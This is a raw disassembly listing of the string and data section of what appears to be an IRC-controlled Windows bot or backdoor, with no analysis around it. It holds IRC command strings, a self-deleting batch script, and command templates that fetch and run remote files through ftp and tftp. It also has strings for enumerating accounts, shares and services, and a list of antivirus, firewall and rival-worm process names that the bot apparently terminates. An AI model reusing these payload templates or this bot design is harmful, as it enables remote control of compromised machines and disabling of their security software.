off_4374B8 dd offset byte_4B5245 ; DATA XREF: seg002:0044315C�o
aSevda db 'sevda',0 ; DATA XREF: seg002:00443158�o
align 4
aKotan db 'kotan',0 ; DATA XREF: seg002:00443154�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: seg002:00443150�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: seg002:0044314C�o
align 10h
aKapk db 'kapk',0 ; DATA XREF: seg002:00443148�o
align 4
aAngelgirl db 'angelgirl',0 ; DATA XREF: seg002:00443144�o
align 4
aHayran db 'hayran',0 ; DATA XREF: seg002:00443140�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: seg002:0044313C�o
align 4
aAnkar db 'Ankar',0 ; DATA XREF: seg002:00443138�o
align 10h
aDjspace db 'DJSPACE',0 ; DATA XREF: seg002:00443134�o
aAnk32M db 'ANK-32-M',0 ; DATA XREF: seg002:00443130�o
align 4
aUmut db 'umut-',0 ; DATA XREF: seg002:0044312C�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: seg002:00443128�o
align 4
aKumul db 'kumul',0 ; DATA XREF: seg002:00443124�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: seg002:00443120�o
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: seg002:0044311C�o
align 10h
aSeviseli db 'SeViSeLi',0 ; DATA XREF: seg002:00443118�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: seg002:00443114�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: seg002:00443110�o
align 10h
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: seg002:0044310C�o
align 10h
aMahinur db 'MAHINUR',0 ; DATA XREF: seg002:00443108�o
aHoly db 'holy',0 ; DATA XREF: seg002:00443104�o
align 10h
aFlord db 'FLoRD',0 ; DATA XREF: seg002:00443100�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: seg002:004430FC�o
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: seg002:004430F8�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: seg002:004430F4�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: seg002:004430F0�o
align 10h
aRamtha db 'RAMTHA',0 ; DATA XREF: seg002:004430EC�o
align 4
aImirzali db 'IMIRZALI--',0 ; DATA XREF: seg002:004430E8�o
align 4
aHakan3 db 'hakan3',0 ; DATA XREF: seg002:004430E4�o
align 4
aMurat34M db 'murat34-m',0 ; DATA XREF: seg002:004430E0�o
align 4
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: seg002:004430DC�o
aArda db 'arda',0 ; DATA XREF: seg002:004430D8�o
align 4
aDevran db 'devran',0 ; DATA XREF: seg002:004430D4�o
align 4
aBerk19m db 'Berk19m',0 ; DATA XREF: seg002:004430D0�o
aDenizlim db 'DenizliM',0 ; DATA XREF: seg002:004430CC�o
align 4
aCongueror db 'CoNGuERoR',0 ; DATA XREF: seg002:004430C8�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: seg002:004430C4�o
align 10h
aBogac db 'bogac',0 ; DATA XREF: seg002:004430C0�o
align 4
aDonjuanm db 'Donjuanm',0 ; DATA XREF: seg002:004430BC�o
align 4
aAnkh db 'ankh',0 ; DATA XREF: seg002:004430B8�o
align 4
off_43764C dd offset byte_457441 ; DATA XREF: seg002:004430B4�o
aAyla db 'AYLA-',0 ; DATA XREF: seg002:004430B0�o
align 4
aAlbina db 'albina',0 ; DATA XREF: seg002:004430AC�o
align 10h
aIzmir39m db 'Izmir39m',0 ; DATA XREF: seg002:004430A8�o
align 4
aZack db 'ZACK',0 ; DATA XREF: seg002:004430A4�o
align 4
aAnk32m db 'ank32m',0 ; DATA XREF: seg002:004430A0�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: seg002:0044309C�o
align 4
aAhmet db 'ahmet',0 ; DATA XREF: seg002:00443098�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: seg002:00443094�o
align 4
aBlackpearl db 'blackpearl',0 ; DATA XREF: seg002:00443090�o
align 4
aRetg db 'RETG',0 ; DATA XREF: seg002:0044308C�o
align 4
aSamyeli21 db 'samyeli21',0 ; DATA XREF: seg002:00443088�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: seg002:00443084�o
aAslii db 'aslii',0 ; DATA XREF: seg002:00443080�o
align 4
aErnesto db 'ERNESTO',0 ; DATA XREF: seg002:0044307C�o
aHaticem db 'haticem',0 ; DATA XREF: seg002:00443078�o
aArzu db 'ARZU',0 ; DATA XREF: seg002:00443074�o
align 10h
aSudenur db 'SUDENUR',0 ; DATA XREF: seg002:00443070�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: seg002:0044306C�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: seg002:00443068�o
align 10h
aTekir db 'tekir',0 ; DATA XREF: seg002:00443064�o
align 4
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: seg002:00443060�o
align 4
aTrend3 db 'trend3',0 ; DATA XREF: seg002:0044305C�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: seg002:00443058�o
align 4
aAkin db 'AKIN',0 ; DATA XREF: seg002:00443054�o
align 4
aMary_0 db 'MARY',0 ; DATA XREF: seg002:00443050�o
align 4
aJericho db 'JERICHO',0 ; DATA XREF: seg002:0044304C�o
aTolga34 db 'Tolga34',0 ; DATA XREF: seg002:00443048�o
aMisssunday db 'misssunday',0 ; DATA XREF: seg002:00443044�o
align 10h
aIrmal db 'irmal',0 ; DATA XREF: seg002:00443040�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: seg002:0044303C�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: seg002:00443038�o
align 10h
aHexaaa db 'hexaaa',0 ; DATA XREF: seg002:00443034�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: seg002:00443030�o
aKaan38dent db 'kaan38dent',0 ; DATA XREF: seg002:0044302C�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: seg002:00443028�o
align 4
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: seg002:00443024�o
align 4
aKencing db 'Kencing',0 ; DATA XREF: seg002:00443020�o
aReshma db 'reshma',0 ; DATA XREF: seg002:0044301C�o
align 4
aCamel db 'CAMEL',0 ; DATA XREF: seg002:00443018�o
align 4
aGirl_0 db 'GirL',0 ; DATA XREF: seg002:00443014�o
align 4
aImra db 'imra',0 ; DATA XREF: seg002:00443010�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: seg002:0044300C�o
align 4
aPuregold db 'puregold',0 ; DATA XREF: seg002:00443008�o
align 4
aKermit db 'kermit',0 ; DATA XREF: seg002:00443004�o
align 4
aManee db 'manee',0 ; DATA XREF: seg002:00443000�o
align 4
aTroller db 'troller',0 ; DATA XREF: seg002:00442FFC�o
aLuisa db 'Luisa',0 ; DATA XREF: seg002:00442FF8�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: seg002:00442FF4�o
align 10h
aRimpy db 'rimpy',0 ; DATA XREF: seg002:00442FF0�o
align 4
aJanno db 'janno',0 ; DATA XREF: seg002:00442FEC�o
align 10h
aBunty db 'bunty',0 ; DATA XREF: seg002:00442FE8�o
align 4
aHeval db 'heval',0 ; DATA XREF: seg002:00442FE4�o
align 10h
aCme db 'cme',0 ; DATA XREF: seg002:00442FE0�o
aMarcy db 'marcy',0 ; DATA XREF: seg002:00442FDC�o
align 4
aTalika db 'talika',0 ; DATA XREF: seg002:00442FD8�o
align 4
aShez db 'Shez',0 ; DATA XREF: seg002:00442FD4�o
align 4
aKen db 'ken',0 ; DATA XREF: seg002:00442FD0�o
aFlexster db 'flexster',0 ; DATA XREF: seg002:00442FCC�o
align 4
aKoko db 'koko',0 ; DATA XREF: seg002:00442FC8�o
align 4
aMale db 'male',0 ; DATA XREF: seg002:00442FC4�o
align 4
aSwin db 'swin',0 ; DATA XREF: seg002:00442FC0�o
align 4
aCar1nna db 'Car1nna',0 ; DATA XREF: seg002:00442FBC�o
aKrizha db 'KRIZHA',0 ; DATA XREF: seg002:00442FB8�o
align 4
aEmilya db 'emilya',0 ; DATA XREF: seg002:00442FB4�o
align 4
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: seg002:00442FB0�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: seg002:00442FAC�o
aFarooq db 'farooq',0 ; DATA XREF: seg002:00442FA8�o
align 4
aSmartmir db 'SMARTMIR',0 ; DATA XREF: seg002:00442FA4�o
align 4
aM_1: ; DATA XREF: seg002:00442FA0�o
; seg002:004432EC�o
unicode 0, <M>,0
aN_0: ; DATA XREF: seg002:00442F9C�o
unicode 0, <N>,0
aB: ; DATA XREF: seg002:00442F98�o
unicode 0, <B>,0
aV_0: ; DATA XREF: seg002:00442F94�o
unicode 0, <V>,0
aC_3: ; DATA XREF: seg002:00442F90�o
unicode 0, <C>,0
asc_4378C8: ; DATA XREF: seg002:00442F8C�o
; seg002:00443320�o
unicode 0, <X>,0
aZ: ; DATA XREF: seg002:00442F88�o
unicode 0, <Z>,0
asc_4378D0: ; DATA XREF: seg002:00442F84�o
unicode 0, <L>,0
aK_0: ; DATA XREF: seg002:00442F80�o
unicode 0, <K>,0
aJ_0: ; DATA XREF: seg002:00442F7C�o
unicode 0, <J>,0
asc_4378DC: ; DATA XREF: seg002:00442F78�o
unicode 0, <H>,0
aG: ; DATA XREF: seg002:00442F74�o
unicode 0, <G>,0
aF_0: ; DATA XREF: seg002:00442F70�o
; seg002:004432E8�o
unicode 0, <F>,0
aD_2: ; DATA XREF: seg002:00442F6C�o
unicode 0, <D>,0
aS_10: ; DATA XREF: seg002:00442F68�o
unicode 0, <S>,0
aP_0: ; DATA XREF: seg002:00442F60�o
unicode 0, <P>,0
aO_0: ; DATA XREF: seg002:00442F5C�o
unicode 0, <O>,0
aU_0: ; DATA XREF: seg002:00442F54�o
unicode 0, <U>,0
aY: ; DATA XREF: seg002:00442F50�o
unicode 0, <Y>,0
aT_0: ; DATA XREF: seg002:00442F4C�o
unicode 0, <T>,0
aR_0: ; DATA XREF: seg002:00442F48�o
unicode 0, <R>,0
aE_0: ; DATA XREF: seg002:00442F44�o
unicode 0, <E>,0
aW: ; DATA XREF: seg002:00442F40�o
unicode 0, <W>,0
aQ_0: ; DATA XREF: seg002:00442F3C�o
unicode 0, <Q>,0
aB_0: ; DATA XREF: seg002:00442F30�o
; seg002:00443224�o ...
unicode 0, <b>,0
asc_437918: ; DATA XREF: seg002:00442F24�o
; seg002:0044327C�o
unicode 0, <x>,0
aZ_0: ; DATA XREF: seg002:00442F20�o
; seg002:00443284�o ...
unicode 0, <z>,0
asc_437920: ; DATA XREF: seg002:00442F10�o
; seg002:0044323C�o
unicode 0, <h>,0
aG_0: ; DATA XREF: seg002:00442F0C�o
; seg002:00443238�o ...
unicode 0, <g>,0
aF_1: ; DATA XREF: seg002:00442F08�o
; seg002:00443234�o
unicode 0, <f>,0
aY_0: ; DATA XREF: seg002:00442EEC�o
; seg002:00443280�o
unicode 0, <y>,0
aW_0: ; DATA XREF: seg002:00442EDC�o
; seg002:00443278�o
unicode 0, <w>,0
align 8
dbl_437938 dq -1.52587890625e-4 ; DATA XREF: sub_41A293+3EF�r
dbl_437940 dq 3.0517578125e-4 ; DATA XREF: sub_41A293+3CF�r
dbl_437948 dq -3.0517578125e-4 ; DATA XREF: sub_41A293+34C�r
; sub_41A293+3B1�r
dbl_437950 dq 1.52587890625e-4 ; DATA XREF: sub_41A293+27E�r
dbl_437958 dq -1.739501953125e-3 ; DATA XREF: sub_41A293+258�r
; sub_41A293+2E8�r ...
dbl_437960 dq 3.11279296875e-3 ; DATA XREF: sub_41A293+E0�r
a__1 db '-|`_\{[]}',0 ; DATA XREF: sub_41A293+BA�o
; sub_41A293+17C�r ...
align 8
dbl_437978 dq 3.0517578125e-5 ; DATA XREF: sub_41A293+AC�r
; sub_41A293+139�r ...
dbl_437980 dq 6.103515625e-5 ; DATA XREF: sub_41A293+90�r
; sub_41A293+317�r
dbl_437988 dq 2.288818359375e-3 ; DATA XREF: sub_41A293+21�r
aNickS_1 db 'NICK %s',0Ah,0 ; DATA XREF: sub_41A6AE+C1�o
align 4
a432 db '432',0 ; DATA XREF: sub_41A6AE+86�o
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_41A6AE+65�o
align 4
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: seg000:0041A83B�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_41ACD0+72�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_41AE17+1A�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_41AEBB+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_41AEDD+140�o
align 10h
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_41AEDD+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_41AEDD+48�o
align 10h
unk_437A80 db 2Dh ; - ; DATA XREF: sub_41B065+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 10h
unk_437AB0 db 2Dh ; - ; DATA XREF: sub_41B065+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
dword_437AD8 dd 234032Dh, 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h
; DATA XREF: sub_41B065+5C�o
dd 65726165h, 64h, 0
aEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: sub_41B128+C2�o
db 'it >> o &ftp -n -s:o &%s',0Dh,0Ah,0
aTftpISGetSS db 'tftp -i %s get %s &%s',0Dh,0Ah,0 ; DATA XREF: sub_41B128+94�o
align 10h
dbl_437B70 dq -3.0517578125e-5 ; DATA XREF: sub_41B325+2B�r
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 10h
aPaused_0 db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 10h
aStopped_0 db 'Stopped',0 ; DATA XREF: seg002:00443434�o
aStop_0 db 'Stop',0 ; DATA XREF: seg002:00443430�o
align 10h
aStarted db 'Started',0 ; DATA XREF: seg002:00443428�o
aStart_0 db 'Start',0 ; DATA XREF: seg002:00443424�o
align 10h
aListed db 'Listed',0 ; DATA XREF: seg002:0044341C�o
align 4
aList_1 db 'List',0 ; DATA XREF: seg002:00443418�o
align 10h
aDeleted db 'Deleted',0 ; DATA XREF: seg002:00443410�o
aDelete_0 db 'Delete',0 ; DATA XREF: seg002:0044340C�o
align 10h
aAdded db 'Added',0 ; DATA XREF: seg002:off_443404�o
align 4
aAdd db 'Add',0 ; DATA XREF: seg002:off_443400�o
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_41B507+128�o
align 10h
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_41B507:loc_41B61B�o
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_41B507:loc_41B614�o
align 8
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_41B507:loc_41B60D�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_41B507:loc_41B606�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_41B507:loc_41B5FF�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_41B507:loc_41B5F8�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_41B507:loc_41B5F1�o
align 8
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_41B507:loc_41B5EA�o
align 10h
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_41B507:loc_41B5E3�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_41B507:loc_41B5DC�o
align 10h
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_41B507:loc_41B5B1�o
align 10h
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_41B507:loc_41B5AA�o
db ' the service.',0
align 10h
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_41B507:loc_41B5A3�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_41B507:loc_41B59C�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_41B507+8B�o
align 8
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_41B507:loc_41B571�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_41B507:loc_41B567�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_41B507:loc_41B55D�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_41B507:loc_41B553�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_41B507:loc_41B549�o
align 10h
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_41B507+38�o
align 4
aSSS_3 db '%s: %s (%s)',0 ; DATA XREF: sub_41B681+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_41B681:loc_41B750�o
aStarting db ' Starting',0 ; DATA XREF: sub_41B681:loc_41B749�o
aStoping db ' Stoping',0 ; DATA XREF: sub_41B681:loc_41B742�o
aRunning db ' Running',0 ; DATA XREF: sub_41B681:loc_41B73B�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_41B681:loc_41B734�o
aPausing db ' Pausing',0 ; DATA XREF: sub_41B681:loc_41B72D�o
aPaused db ' Paused',0 ; DATA XREF: sub_41B681:loc_41B726�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_41B681+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_41B681+25�o
align 4
unk_438134 db 2Dh ; - ; DATA XREF: sub_41B98C+394�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_41B98C+36A�o
align 4
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_41B98C+33F�o
align 10h
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_41B98C+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_41B98C+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_41B98C+2C4�o
align 4
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_41B98C+299�o
align 10h
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_41B98C+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_41B98C+246�o
align 10h
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_41B98C+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_41B98C+1F3�o
align 10h
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_41B98C+1CB�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_41B98C+1A0�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_41B98C+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_41B98C+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_41B98C+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_41B98C:loc_41BAA5�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_41B98C:loc_41BA9E�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_41B98C:loc_41BA97�o
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_41B98C+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_41B98C+AC�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_41B98C+81�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_41B98C+50�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_41BD5A:loc_41BE73�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_41BD5A:loc_41BE6C�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_41BD5A:loc_41BE65�o
align 10h
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_41BD5A:loc_41BE5E�o
align 10h
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_41BD5A:loc_41BE57�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_41BD5A:loc_41BE3A�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_41BD5A:loc_41BE33�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_41BD5A:loc_41BE2C�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_41BD5A+CB�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_41BD5A:loc_41BE01�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_41BD5A:loc_41BDFA�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_41BD5A:loc_41BDF3�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_41BD5A:loc_41BDE9�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_41BD5A+85�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_41BD5A:loc_41BDC3�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_41BD5A:loc_41BDB9�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_41BD5A:loc_41BDAF�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_41BD5A:loc_41BDA5�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_41BD5A:loc_41BD9B�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_41BD5A+37�o
align 10h
dword_4385A0 dd 234032Dh, 274656Eh, 25202D03h, 34032073h, 76726553h
; DATA XREF: sub_41BE8A+A4�o
dd 3A037265h, 20532520h, 654D3403h, 67617373h, 203A0365h
dd 5325h
unk_4385CC db 2Dh ; - ; DATA XREF: sub_41BE8A+7C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 4
unk_4385F4 db 2Dh ; - ; DATA XREF: sub_41BF46+65�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
unk_438618 db 2Dh ; - ; DATA XREF: sub_41BF46+4F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 4
unk_438644 db 2Dh ; - ; DATA XREF: sub_41BF46+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
unk_438660 db 2Dh ; - ; DATA XREF: sub_41BFBE+AA�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 4
dword_438684 dd 234032Dh, 274656Eh, 25202D03h, 68732073h, 3A657261h
; DATA XREF: sub_41BFBE+88�o
dd 73252720h, 27h
unk_4386A0 db 2Dh ; - ; DATA XREF: sub_41BFBE+56�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_41C07C+CE�o
align 4
aNo db 'No',0 ; DATA XREF: sub_41C07C+BA�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_41C07C+B3�o
unk_4386EC db 2Dh ; - ; DATA XREF: sub_41C07C+74�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_41C07C+1D�o
align 4
unk_43874C db 2Dh ; - ; DATA XREF: sub_41C19B+B5�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 4
unk_438774 db 2Dh ; - ; DATA XREF: sub_41C19B+93�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 4
unk_4387A4 db 2Dh ; - ; DATA XREF: sub_41C19B+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41C265+144�o
align 4
unk_4387DC db 2Dh ; - ; DATA XREF: sub_41C265:loc_41C350�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 4
aS_4 db ' %S',0 ; DATA XREF: sub_41C265+B8�o
align 10h
unk_438810 db 2Dh ; - ; DATA XREF: sub_41C265+78�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41C265+1F�o
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: seg002:004434BC�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: seg002:004434B8�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: seg002:004434B4�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: seg002:004434B0�o
align 10h
aSsate_exe db 'ssate.exe',0 ; DATA XREF: seg002:004434AC�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: seg002:004434A8�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: seg002:004434A4�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: seg002:004434A0�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: seg002:0044349C�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: seg002:00443498�o
aTeekids_exe db 'teekids.exe',0 ; DATA XREF: seg002:00443494�o
aMsblast_exe db 'MSBLAST.exe',0 ; DATA XREF: seg002:00443490�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: seg002:0044348C�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: seg002:00443488�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: seg002:00443484�o
align 10h
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: seg002:00443480�o
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: seg002:0044347C�o
align 4
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: seg002:00443478�o
align 4
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: seg002:00443474�o
align 4
aZapro_exe db 'zapro.exe',0 ; DATA XREF: seg002:00443470�o
align 10h
aMsblast_exe_0 db 'msblast.exe',0 ; DATA XREF: seg002:0044346C�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: seg002:00443468�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: seg002:00443464�o
align 4
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: seg002:off_443460�o
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_41C444+183�o
align 10h
dd 234032Dh, 636F7270h, 2D030273h, 6F727020h, 73736563h
dd 73696C20h, 61662074h, 64656C69h, 0
db 2Dh ; -
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
aPrivmsgSS_1 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_41C7F5+33�o
unk_438A28 db 2Dh ; - ; DATA XREF: seg000:loc_41C9AC�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess.',0Dh,0Ah,0
unk_438A58 db 2Dh ; - ; DATA XREF: seg000:0041C9A5�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 10h
unk_438A80 db 2Dh ; - ; DATA XREF: seg000:0041C973�o
